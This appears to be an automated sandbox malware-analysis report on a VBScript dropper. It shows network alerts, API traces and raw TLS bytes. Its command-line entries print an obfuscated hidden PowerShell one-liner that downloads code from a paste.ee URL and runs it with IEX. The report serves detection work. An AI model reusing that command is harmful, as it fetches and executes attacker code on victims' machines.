Summary | ZeroBOX

vnm2.txt.vbs

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us July 29, 2024, 5:03 p.m. July 29, 2024, 5:05 p.m.
Size 8.3KB
Type ASCII text, with CRLF line terminators
MD5 8b2d2b9a6d36abcb2b1b8a60f9898374
SHA256 dafd3a15f6a974dc3409aa3179bd9b3b699ae7ba180a261a07ee98490486a43b
CRC32 3974AB2C
ssdeep 192:GiFSTRuYgmY9CfjdUxdNGwpw3xb4FK+F8S7jXsaBZPk+oyRcaMu+JNeit194AM8B:Z8wnK
Yara
  • Antivirus - Contains references to security software

Name Response Post-Analysis Lookup
paste.ee 104.21.84.67
IP Address Status Action
104.21.84.67 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53 2054041 ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee) Misc activity
TCP 192.168.56.103:49165 -> 104.21.84.67:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.103:49165 -> 104.21.84.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49165
104.21.84.67:443
C=US, O=Google Trust Services, CN=WE1 CN=paste.ee db:ac:96:3c:aa:07:4d:6f:90:48:a6:34:79:1d:71:cf:4d:ef:d9:c2

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: IsPublic IsSerial Name BaseType
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: True True Byte[] System.Array
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: True True Byte[] System.Array
console_handle: 0x00000027
1 1 0

WriteConsoleW

buffer: True True Byte[] System.Array
console_handle: 0x0000002b
1 1 0

WriteConsoleW

buffer: Invoke-Expression : The '<' operator is reserved for future use.
console_handle: 0x0000003f
1 1 0

WriteConsoleW

buffer: At line:1 char:4
console_handle: 0x0000004b
1 1 0

WriteConsoleW

buffer: + IeX <<<< (NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('https://paste.ee/d/Cyxef/
console_handle: 0x00000057
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ParserError: (<:OperatorToken) [Invoke-Expressio
console_handle: 0x0000006f
1 1 0

WriteConsoleW

buffer: n], ParseException
console_handle: 0x0000007b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : RedirectionNotSupported,Microsoft.PowerShell.Com
console_handle: 0x00000087
1 1 0

WriteConsoleW

buffer: mands.InvokeExpressionCommand
console_handle: 0x00000093
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003118d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003118d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003118d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003110d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003110d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003110d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003110d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003110d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003110d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003118d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003118d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003118d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311e58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311e58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311e58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311e58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311e58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311e58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311e58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311e58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311e58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311e58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00311c98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05fc0a00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05fc0a00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05fc0a00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05fc0a00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05fc0a00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05fc0a00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://paste.ee/d/Cyxef/0
request GET https://paste.ee/d/Cyxef/0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02660000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02760000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72681000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0245a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72682000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02452000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02462000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02761000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02762000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02463000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02464000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0245b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02465000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02750000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02466000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02493000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02494000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02495000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02496000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02497000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02498000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02499000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e1d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e1e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e1f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: Cmd.exe
parameters: /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
filepath: Cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received Wf§LÚ(æïØΨ¾ÛöeÆÊõ£HaDOWNGRD =øºõVNÀ›P˜é^}8•­a;.Õ!Õ,~2ñÀ ÿ 
Data received  Ò
Data received Î Ë¡0‚0‚B ­ú«>Þ9ÙdïÖ.¬0 *†HÎ=0;1 0 UUS10U Google Trust Services1 0 UWE10 240622144918Z 240920144917Z010Upaste.ee0Y0*†HÎ=*†HÎ=BA>Ó-z V/¥\ˆô]Oàê Ðé¡÷!f žÄr œq%þ.Mç7bíþKîç°¸—µíÁÂzÑÐ|O] ?’£‚M0‚I0Uÿ€0U% 0 +0 Uÿ00UBz~‹<"ñã6¸ri¸N bW{‰0U#0€w’5gÄÿ¨Ì©æ{ـy{̓ù80^+R0P0'+0†http://o.pki.goog/s/we1/rfo0%+0†http://i.pki.goog/we1.crt0U0‚paste.ee‚ *.paste.ee0U  0 0g 06U/0-0+ ) '†%http://c.pki.goog/we1/t4Y_tS4oQ9A.crl0‚ +ÖyõòðußáV몯µœ†q¨À2N®VÙn§õ¥jÑÁ;¾R\@£BÏF0D ;2Áj³,ÛÊŽø‡Œ¢<U×+vªÇëÑäÇÝ1“r¤%¤ "8} ԓ\åIC¼‚PW:Äo‡˜¤Ñ×ì㕓™æwvÿˆ? ¶û•QÂaÌõ‡º4´¤Í»)ÜhB ŸægLZ:t@£B3H0F!çSaÔ))˜,}8 b?7î›k&æ›õј‚õ÷!†œ‘þµ¦1 ¨¾ yÞ²*ªZxŸ¦‹$h–]ÞvG0 *†HÎ=I0F!ÄsHv¬N–À°ú@àOœž•/Ø\ÜÜÞstÝí…V!àMv$” å,´X¡‰šP›·ÐïÿB±õ0ôj‹eK£0‚Ÿ0‚% ów—,"Jv]¶Ö…ã0 *†HÎ=0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R40 231213090000Z 290220140000Z0;1 0 UUS10U Google Trust Services1 0 UWE10Y0*†HÎ=*†HÎ=BoÍ:þgWGL!…@ÂG]»XG@Á\…Æ7çÕ|í†K›Ù×¥ ø˜ÄÆèžÿY,&˜õæ&%»úV£þ0û0Uÿ†0U%0++0Uÿ0ÿ0Uw’5gÄÿ¨Ì©æ{ـy{̓ù80U#0€€LÖëtÿI6£ÕØüµ>Åjð”Œ04+(0&0$+0†http://i.pki.goog/r4.crt0+U$0"0   †http://c.pki.goog/r/r4.crl0U  0 0g 0 *†HÎ=h0e1ç«QÖ÷C•ÎuþÑ”ÕÌ@Az&¾Ø ó2-=®#HR>dy¯õ¦,nU±0&‰Ìhb牫~èÖD~ãLI¿l€b4¸²¡~:ˆP¼§ˆ Ÿ}sìRAMîâV~0‚z0‚b å0¿3C¾Ý‚I=Š0  *†H†÷  0W1 0 UBE10U GlobalSign nv-sa10U Root CA10UGlobalSign Root CA0 231115034321Z 280128000042Z0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root 